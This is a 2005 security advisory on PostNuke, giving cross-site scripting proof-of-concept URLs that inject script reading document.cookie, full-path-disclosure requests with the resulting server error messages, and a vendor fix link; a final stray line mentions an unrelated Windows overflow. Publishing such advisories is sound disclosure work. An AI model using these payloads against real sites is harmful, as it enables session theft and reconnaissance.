If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive : exploit()securityreason()com
Details : SecurityReason Advisory
Topic : PostNuke XSS and Full path disclosure 0.760RC3=>x SecurityAlert : 18 SecurityRisk : Medium (About) Remote Exploit : Yes Local Exploit : Yes Exploit Given : Yes Credit : Maksymilian Arciemowicz Date : 10.09.2005
Affected Software :
PostNuke 0.760RC3=>x
Advisory Text :
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[PostNuke XSS and Full path disclosure 0.760RC3=>x cXIb8O3.7]
Author: Maksymilian Arciemowicz ( cXIb8O3 )
Date: 15.3.2005
from SECURITYREASON.COM
- --- 0.Description ---
PostNuke: The Phoenix Release (0.750) and (0.760RC3)
PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system.
PostNuke
is still undergoing development but a large number of core functions are
now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/
- --- 1. Cross Site Scripting ---
1.0
http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?skin=%3C/script%3E%3Csc
ript%3Ealert(document.cookie)%3C/script%3E
http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?paletteid=%3C/script%3E
%3Cscript%3Ealert(document.cookie)%3C/script%3E
etc.
1.1
If you can see php error and register global = On
http://[HOST]/[DIR]/modules/Multisites/installation/config.php?serverName=<
H1>SUICIDE</H1>
or for 0.750
http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php?serverNam
e=<H1>SUICIDE</H1>
Error message :
- ---------------
Warning: main(/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php)
[function.main]: failed to open stream: No such file or directory in
/www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.p
hp on line 8
Fatal error: main() [function.require]: Failed opening required
'/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php'
(include_path='.:') in
/www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.p
hp on line 8
- ---------------
Error message :
- ---------------
Fatal error: Call to undefined function pnModGetVar() in
/www/PostNuke-0.760-RC3/html/modules/Xanthia/pnclasses/Xanthia.php on line
48
- ---------------
Error message :
- ---------------
Fatal error: Call to undefined function pnSecAddSchema() in
/www/PostNuke-0.760-RC3/html/modules/Blocks/pnblocks/button.php on line 48
- ---------------
2.3
http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php
or for 0.760RC3
http://[HOST]/[DIR]/modules/Multisites/installation/config.php
Error message :
- ---------------
Warning: main(parameters/whoisit.inc.php) [function.main]: failed to open
stream: No such file or directory in
/www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on
line 2
Warning: main() [function.include]: Failed opening
'parameters/whoisit.inc.php' for inclusion (include_path='.:') in
/www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on
line 2
- ---------------
2.4
http://[HOST]/[DIR]/xmlrpc.php
Error message :
- ---------------
Fatal error: Cannot redeclare xmlrpc_decode() in
/www/PostNuke-0.760-RC3/html/modules/xmlrpc/lib/xmlrpc.inc on line 1068
- ---------------
- --- 3. How to fix ---
PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.ht
ml
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory.